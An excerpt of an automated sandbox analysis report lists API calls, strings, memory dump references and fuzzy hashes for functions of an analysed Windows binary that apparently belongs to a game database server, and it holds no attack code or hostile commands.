                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_AddCurrentBattlePoint] (?,?,?) }
                                                                                      • API String ID: 0-1137140816
                                                                                      • Opcode ID: a10efe64c2b4eece83ca5edc464e9465f8097245f36cbe621f07f87fe0f3a8a7
                                                                                      • Instruction ID: 9b9fe0eb316ef440d4bd3b6d791f8c645c89d58c36ae688d7416f7835c8553c9
                                                                                      • Opcode Fuzzy Hash: a10efe64c2b4eece83ca5edc464e9465f8097245f36cbe621f07f87fe0f3a8a7
                                                                                      • Instruction Fuzzy Hash: E531F471644314FBEB20DB94CD52FDA7334DB84B18F118286F7146E2C6D6B179408B68
                                                                                      APIs
                                                                                      • CreateWindowExA.USER32(00000300,004E5318,004E5380,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,000000C8,00000000), ref: 00410AF7
                                                                                      • SetWindowTextA.USER32(00000000,?), ref: 00410B9C
                                                                                      • ShowWindow.USER32(00000000,00000014), ref: 00410BAA
                                                                                      • UpdateWindow.USER32(00000000), ref: 00410BB4
                                                                                      Strings
                                                                                      • DBServer, xrefs: 00410B78
                                                                                      • %s (time stamp: %02d/%02d/%02d %02d:%02d:%02d), xrefs: 00410B7D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CreateShowTextUpdate
                                                                                      • String ID: %s (time stamp: %02d/%02d/%02d %02d:%02d:%02d)$DBServer
                                                                                      • API String ID: 1012791148-3660825906
                                                                                      • Opcode ID: 7aca922edc9638e8e895eae531d2e6794f80a6047581dfaac401ce26145d8a97
                                                                                      • Instruction ID: 6eecb4df80f49ab7bff88b7e96a3dc04cd24397cfe6db05400e359f373b85aa7
                                                                                      • Opcode Fuzzy Hash: 7aca922edc9638e8e895eae531d2e6794f80a6047581dfaac401ce26145d8a97
                                                                                      • Instruction Fuzzy Hash: 2D3161B5A00208EFC758DB54CC86FDAB3B5EB4C704F108599FA0997381D6B4AA80CF68
                                                                                      APIs
                                                                                        • Part of subcall function 004678E0: RegOpenKeyExA.ADVAPI32(?,Software,00000000,00020019,00000000), ref: 00467915
                                                                                        • Part of subcall function 004678E0: RegCreateKeyExA.ADVAPI32(00000000,?,00000000,00000000,00000000,00020019,00000000,00000000,?), ref: 00467945
                                                                                        • Part of subcall function 004678E0: RegCreateKeyExA.ADVAPI32(00000000,?,00000000,00000000,00000000,00020019,00000000,00000000,?), ref: 00467975
                                                                                        • Part of subcall function 004678E0: RegCloseKey.ADVAPI32(00000000), ref: 00467985
                                                                                        • Part of subcall function 004678E0: RegCloseKey.ADVAPI32(00000000), ref: 00467995
                                                                                      • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0046782F
                                                                                      • RegCloseKey.ADVAPI32(00000000,?,0041088E), ref: 0046783C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: Close$Create$DeleteOpen
                                                                                      • String ID:
                                                                                      • API String ID: 461616257-0
                                                                                      • Opcode ID: e42abdaa3a643a11935ec791bff7ac2f4b572fa17c06f4ab6fac7515b18889c1
                                                                                      • Instruction ID: c147f9c4723ad805c6b58e431de9d38325ef5725de6b27e87f9668680de19a6c
                                                                                      • Opcode Fuzzy Hash: e42abdaa3a643a11935ec791bff7ac2f4b572fa17c06f4ab6fac7515b18889c1
                                                                                      • Instruction Fuzzy Hash: 06311CB5E14208EFCB44EFA4C948FAF77B4BB48309F108869E516D7250E7789E40DB69
                                                                                      APIs
                                                                                      • RegOpenKeyExA.ADVAPI32(?,Software,00000000,00020019,00000000), ref: 00467915
                                                                                      • RegCreateKeyExA.ADVAPI32(00000000,?,00000000,00000000,00000000,00020019,00000000,00000000,?), ref: 00467945
                                                                                      • RegCreateKeyExA.ADVAPI32(00000000,?,00000000,00000000,00000000,00020019,00000000,00000000,?), ref: 00467975
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00467985
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00467995
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreate$Open
                                                                                      • String ID: Software
                                                                                      • API String ID: 1740278721-2393246361
                                                                                      • Opcode ID: a9cb0e97d70efaa017145d65cdff0381e3352e0355c3134bb9a80188b5dbe006
                                                                                      • Instruction ID: 891ed00f848382a3ca417b3777e18350f961970f963370bac19f0925d13d4907
                                                                                      • Opcode Fuzzy Hash: a9cb0e97d70efaa017145d65cdff0381e3352e0355c3134bb9a80188b5dbe006
                                                                                      • Instruction Fuzzy Hash: 252141B9E00208FFEB14CF95CC85FEEB7B8AB44704F108059F601AB291D378AA45DB94
                                                                                      APIs
                                                                                      • GetStringTypeW.KERNEL32(00000001,004D593C,00000001,?,004D6430,0000001C,00487059,00000001,00000000,00000001,?,830675C0,458AFC55,00000001), ref: 0048D998
                                                                                      • GetLastError.KERNEL32(?,?,00481DF0,?,00459BC3,00000107,00459BC3,00000000), ref: 0048D9AA
                                                                                      • MultiByteToWideChar.KERNEL32(00481DF0,00000000,00000107,00459BC3,00000000,00000000,004D6430,0000001C,00487059,00000001,00000000,00000001,?,830675C0,458AFC55,00000001), ref: 0048DA0C
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000107,00000000,?,00000000,00000107,00459BC3), ref: 0048DA8A
                                                                                      • GetStringTypeW.KERNEL32(00459BC3,?,00000000,?,?,00000000,00000107,00459BC3), ref: 0048DA9C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiStringTypeWide$ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 3581945363-0
                                                                                      • Opcode ID: 9ddaf16b7a11bcb62f15ada064182a51a07c65eb6b4af17164f4afa8aada7c50
                                                                                      • Instruction ID: 46c4221109948da2e3a99ec6f29fc0246ce83ad84d716e2f6ab8bbf3691d610e
                                                                                      • Opcode Fuzzy Hash: 9ddaf16b7a11bcb62f15ada064182a51a07c65eb6b4af17164f4afa8aada7c50
                                                                                      • Instruction Fuzzy Hash: 3441D271C02229EFCF21AF54DC45EAF3B75EF48760F25091AF811962A1D7398D51CB98
                                                                                      APIs
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000), ref: 0044757B
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000), ref: 004475AB
                                                                                      • #4.ODBC32(?,00000000,000000E7,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 004475DB
                                                                                      • #4.ODBC32(?,00000000,0000005D,?,00000000,00000000,?,00000000,000000E7,?,00000000,00000000,?,00000000,000000F0,?), ref: 0044760B
                                                                                      • #4.ODBC32(?,00000000,0000005D,?,00000000,00000000,?,00000000,0000005D,?,00000000,00000000,?,00000000,000000E7,?), ref: 0044763B
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,0000005D,?,00000000,00000000,?,00000000,0000005D,?), ref: 0044766B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 93f5c9d7aabc8456a09ab9c1e231d736f0dbe2fed4fadc81501e5aa0c3557665
                                                                                      • Instruction ID: 93e2ff23d54b431ec10b527923a8778e51bad37c1066a01d0ad19e403696d23c
                                                                                      • Opcode Fuzzy Hash: 93f5c9d7aabc8456a09ab9c1e231d736f0dbe2fed4fadc81501e5aa0c3557665
                                                                                      • Instruction Fuzzy Hash: 9831D9B1A40618ABDB24DB09CC51FEA7379EB85718F1081C9F6187B381D675AF90CF94
                                                                                      APIs
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000), ref: 004477BB
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000), ref: 004477EB
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 0044781B
                                                                                      • #4.ODBC32(?,00000000,000000F1,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 0044784B
                                                                                      • #4.ODBC32(?,00000000,000000F1,?,00000000,00000000,?,00000000,000000F1,?,00000000,00000000,?,00000000,000000F0,?), ref: 0044787B
                                                                                      • #4.ODBC32(?,00000000,000000F1,?,00000000,00000000,?,00000000,000000F1,?,00000000,00000000,?,00000000,000000F1,?), ref: 004478AB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bf63533c9aadaec52220169e73ca218fcf0a25986bd6c15840edec9c80a99a0d
                                                                                      • Instruction ID: 45d513a0722ffa10eaf3df4b95e23e8df94b89d9dae055eac95bd59b5f9c7971
                                                                                      • Opcode Fuzzy Hash: bf63533c9aadaec52220169e73ca218fcf0a25986bd6c15840edec9c80a99a0d
                                                                                      • Instruction Fuzzy Hash: 3A311EB1900918EBDB24CB49CD55FEA7335EBC471AF108288F5186F3C1E6796D848F54
                                                                                      APIs
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000), ref: 0044696B
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000), ref: 0044699B
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 004469CB
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 004469FB
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 00446A2B
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 00446A5B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
